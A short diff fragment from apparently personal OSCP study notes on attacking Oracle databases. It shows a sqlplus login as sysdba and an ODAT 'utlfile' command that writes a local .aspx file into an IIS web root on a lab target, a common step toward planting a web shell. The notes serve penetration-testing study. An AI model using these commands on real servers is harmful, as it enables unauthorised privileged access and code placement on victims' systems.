linatl/jekyll-gitbook/_posts/OSCP/2021-03-02-portenumeration.markdown

 sysbda
 See sysbda for oracle as being kind of similar as sudo for linux, you can do more cause you have more privileges.
 > sqlplus username/password@10.10.10.10:1521/SID as sysdba

+File upload using odat:
+This will put the test.aspx local file in the c:\inetpub\wwwroot\ folder like file.aspx on the 10.10.10.10 server
+> python3 odat.py utlfile -s 10.10.10.10 -d SID -U username -P password --sysdba --putFile 'c:\inetpub\wwwroot\' file.aspx test.aspx
 ```